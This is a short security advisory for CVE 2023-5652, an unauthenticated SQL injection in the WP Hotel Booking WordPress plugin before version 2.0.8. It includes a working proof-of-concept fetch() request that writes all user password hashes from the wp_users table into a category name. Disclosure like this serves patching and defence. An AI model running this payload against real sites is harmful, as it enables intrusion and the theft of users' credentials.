WP Hotel Booking < 2.0.8 – Unauthenticated SQLi | CVE 2023-5652

Description

The plugin does not have authorisation and CSRF checks, as well as does not escape user input before using it in a SQL statement of a function hooked to admin_init, allowing unauthenticated users to perform SQL injections

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog unauthenticated

fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT GROUP_CONCAT(user_pass) FROM wp_users), term_id=CASE when 1=1 THEN 1 ',"method": "POST"});

The above will set the name of the 1st category name (see in the backend as admin) to GROUP_CONCAT of user passwords (even though the request will result in an error 400)